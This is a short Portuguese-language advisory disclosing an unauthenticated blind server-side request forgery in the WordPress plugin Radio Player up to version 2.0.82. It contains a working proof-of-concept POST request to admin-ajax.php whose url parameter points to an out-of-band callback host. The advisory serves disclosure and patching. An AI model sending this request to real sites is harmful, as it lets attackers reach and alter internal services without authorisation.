
Radio Player <= 2.0.82 - Falsificação de Solicitação do Lado do Servidor cega e não autenticada
Radio Player <= 2.0.82 - Server-Side Request Forgery não autenticado
O plugin Radio Player – Live Shoutcast, Icecast e qualquer player de streaming de áudio para WordPress é vulnerável a Server-Side Request Forgery em todas as versões até, e incluindo, a 2.0.82. Isso permite que atacantes não autenticados façam requisições web para locais arbitrários originados da aplicação web, o que pode ser usado para consultar e modificar informações de serviços internos.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8